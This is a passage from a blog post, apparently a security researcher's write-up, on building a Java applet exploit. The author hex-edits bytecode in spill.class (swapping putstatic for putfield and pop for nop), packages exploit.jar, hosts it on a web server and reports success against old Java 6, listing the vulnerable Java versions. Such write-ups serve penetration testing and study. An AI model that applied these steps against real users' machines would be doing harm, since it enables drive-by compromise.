From the javap output of spill.class, I can see I have an aload_0 command, followed by a pop, followed by an aload_2 command, followed by the putstatic command. Using the wiki page, this translates to the bytes 2A, 57, 2C, B3. In a hex editor, I searched for these bytes (2A572CB3), and found the line.
spill class search for bytecode

The putfield command used in XLR is byte B5, so I changed the B3 to a B5, and I replaced the pop with a nop (00) byte, then saved the new spill.class file.

After that, I jarred up the class files (jar cvf exploit.jar *.class), placed them on my web server, and tested it out with my windows VM running an old version of Java 6.
Java6u20 exploit success

Works great!

The exploit works against Java 7u4 and below, Java 6u32 and below, Java 5u35 and below, and 1.4.2_37 and below. While it's not the newest and greatest exploit, old exploits are still quite effective.

Leave a Comment

NOTE - You can use these HTML tags and attributes:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>